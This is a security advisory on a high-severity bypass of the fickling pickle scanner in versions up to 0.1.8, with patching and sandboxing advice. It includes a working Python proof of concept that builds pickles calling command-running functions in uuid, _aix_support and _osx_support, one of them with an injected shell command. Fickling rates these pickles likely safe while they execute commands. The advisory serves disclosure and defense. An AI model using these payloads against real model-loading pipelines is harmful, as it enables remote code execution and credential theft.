GHSA-5hwf-rc88-82xm

GHSA-5hwf-rc88-82xm HIGH
Published March 4, 2026
CISO Take

If your ML pipelines use fickling to validate pickle files before loading models, update to 0.1.9 immediately — versions ≤0.1.8 can be bypassed with a crafted pickle that fickling reports as LIKELY_SAFE while executing arbitrary system commands. This is critical because the vulnerability converts your security control into false assurance, which is worse than no scanning. Patch today, sandbox model loading as defense-in-depth, and audit any externally-sourced models loaded during the vulnerable window.

Affected Systems

Package Ecosystem Vulnerable Range Patched
fickling pip <= 0.1.8 0.1.9

Do you use fickling? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. 1) PATCH: upgrade fickling to 0.1.9+ immediately — this is the only complete fix. 2) WORKAROUND (if patching delayed): manually add 'uuid', '_osx_support', '_aix_support' to your UNSAFE_IMPORTS configuration. 3) SANDBOX: run model deserialization in isolated environments (gVisor, seccomp-restricted containers, AWS Lambda with minimal IAM) regardless of fickling verdict. 4) AUDIT: review model loading logs from external sources ingested while running fickling ≤0.1.8; look for unexpected subprocess activity or os.system calls. 5) DETECT: deploy runtime security tooling (Falco, eBPF-based) to alert on subprocess spawning during model load operations. 6) ARCHITECTURE: treat pickle safety scanners as one layer, not the sole gate — consider allowlist-based pickle validation or safe serialization formats (safetensors, ONNX) for externally-sourced models.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art.15 - Accuracy, robustness and cybersecurity for high-risk AI systems
ISO 42001
A.6.2.6 - AI system security controls
NIST AI RMF
MANAGE-2.2 - Risk response plans for AI risks
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Technical Details

NVD Description

# Assessment The modules `uuid`, `_osx_support` and `_aix_support` were added to the blocklist of unsafe imports (https://github.com/trailofbits/fickling/commit/ffac3479dbb97a7a1592d85991888562d34dd05b). # Original report ## Summary fickling's `UNSAFE_IMPORTS` blocklist is missing at least 3 stdlib modules that provide direct arbitrary command execution: `uuid`, `_osx_support`, and `_aix_support`. These modules contain functions that internally call `subprocess.Popen()` or `os.system()` with attacker-controlled arguments. A malicious pickle file importing these modules passes both `UnsafeImports` and `NonStandardImports` checks. ## Affected Versions - fickling <= 0.1.8 (all versions) ## Details ### Missing Modules fickling's `UNSAFE_IMPORTS` (86 modules) does not include: | Module | RCE Function | Internal Mechanism | Importable On | |--------|-------------|-------------------|---------------| | `uuid` | `_get_command_stdout(cmd, *args)` | `subprocess.Popen((cmd,) + args, stdout=PIPE, stderr=DEVNULL)` | All platforms | | `_osx_support` | `_read_output(cmdstring)` | `os.system(cmd)` via temp file | All platforms | | `_osx_support` | `_find_build_tool(toolname)` | Command injection via `%s` in `_read_output("/usr/bin/xcrun -find %s" % toolname)` | All platforms | | `_aix_support` | `_read_cmd_output(cmdstring)` | `os.system(cmd)` via temp file | All platforms | **Critical note:** Despite the names `_osx_support` and `_aix_support` suggesting platform-specific modules, they are importable on ALL platforms. Python includes them in the standard distribution regardless of OS. ### Why These Pass fickling 1. **`NonStandardImports`**: These are stdlib modules, so `is_std_module()` returns True → not flagged 2. **`UnsafeImports`**: Module names not in `UNSAFE_IMPORTS` → not flagged 3. **`OvertlyBadEvals`**: Function names added to `likely_safe_imports` (stdlib) → skipped 4. **`UnusedVariables`**: Defeated by BUILD opcode (purposely unhardend) ### Proof of Concept (using fickling's opcode API) ```python from fickling.fickle import ( Pickled, Proto, Frame, ShortBinUnicode, StackGlobal, TupleOne, TupleTwo, Reduce, EmptyDict, SetItem, Build, Stop, ) from fickling.analysis import check_safety import struct, pickle frame_data = b"\x95" + struct.pack("<Q", 60) # uuid._get_command_stdout — works on ALL platforms uuid_payload = Pickled([ Proto(4), Frame(struct.pack("<Q", 60), data=frame_data), ShortBinUnicode("uuid"), ShortBinUnicode("_get_command_stdout"), StackGlobal(), ShortBinUnicode("echo"), ShortBinUnicode("PROOF_OF_CONCEPT"), TupleTwo(), Reduce(), EmptyDict(), ShortBinUnicode("x"), ShortBinUnicode("y"), SetItem(), Build(), Stop(), ]) # _aix_support._read_cmd_output — works on ALL platforms aix_payload = Pickled([ Proto(4), Frame(struct.pack("<Q", 60), data=frame_data), ShortBinUnicode("_aix_support"), ShortBinUnicode("_read_cmd_output"), StackGlobal(), ShortBinUnicode("echo PROOF_OF_CONCEPT"), TupleOne(), Reduce(), EmptyDict(), ShortBinUnicode("x"), ShortBinUnicode("y"), SetItem(), Build(), Stop(), ]) # _osx_support._find_build_tool — command injection via %s osx_payload = Pickled([ Proto(4), Frame(struct.pack("<Q", 60), data=frame_data), ShortBinUnicode("_osx_support"), ShortBinUnicode("_find_build_tool"), StackGlobal(), ShortBinUnicode("x; echo INJECTED #"), TupleOne(), Reduce(), EmptyDict(), ShortBinUnicode("x"), ShortBinUnicode("y"), SetItem(), Build(), Stop(), ]) # All three: fickling reports LIKELY_SAFE for name, p in [("uuid", uuid_payload), ("aix", aix_payload), ("osx", osx_payload)]: result = check_safety(p) print(f"{name}: severity={result.severity}, issues={len(result.results)}") # Output: severity=Severity.LIKELY_SAFE, issues=0 # All three: pickle.loads() executes the command pickle.loads(uuid_payload.dumps()) # prints PROOF_OF_CONCEPT ``` ### Verified Output ``` $ python3 poc.py uuid: severity=Severity.LIKELY_SAFE, issues=0 aix: severity=Severity.LIKELY_SAFE, issues=0 osx: severity=Severity.LIKELY_SAFE, issues=0 PROOF_OF_CONCEPT ``` ## Impact An attacker can craft a pickle file that executes arbitrary system commands while fickling reports it as `LIKELY_SAFE`. This affects any system relying on fickling for pickle safety validation, including ML model loading pipelines. ## Suggested Fix Add to `UNSAFE_IMPORTS` in fickling: ```python "uuid", "_osx_support", "_aix_support", ``` **Longer term:** Consider an allowlist approach — only permit known-safe stdlib modules rather than blocking known-dangerous ones. The current 86-module blocklist still has gaps because the Python stdlib contains hundreds of modules. ## Resources - Python source: `Lib/uuid.py` lines 156-168 (`_get_command_stdout`) - Python source: `Lib/_osx_support.py` lines 35-52 (`_read_output`), lines 54-68 (`_find_build_tool`) - Python source: `Lib/_aix_support.py` lines 14-30 (`_read_cmd_output`) - fickling source: `analysis.py` `UNSAFE_IMPORTS` set

Exploitation Scenario

An adversary targeting an MLOps pipeline publishes a malicious PyTorch model to a public registry (HuggingFace Hub, GitHub, research paper artifact). The model is serialized as a pickle containing a Build opcode invoking uuid._get_command_stdout with attacker-controlled arguments. When the victim's CI/CD pipeline runs fickling to pre-screen the artifact, fickling returns LIKELY_SAFE with zero issues flagged. The pipeline proceeds to load the model, triggering arbitrary command execution in the context of the ML worker process — enabling reverse shell establishment, credential exfiltration from mounted secrets, or lateral movement into training infrastructure. The attack is especially effective against automated model evaluation pipelines where no human reviews fickling output.

Timeline

Published
March 4, 2026
Last Modified
March 4, 2026
First Seen
March 24, 2026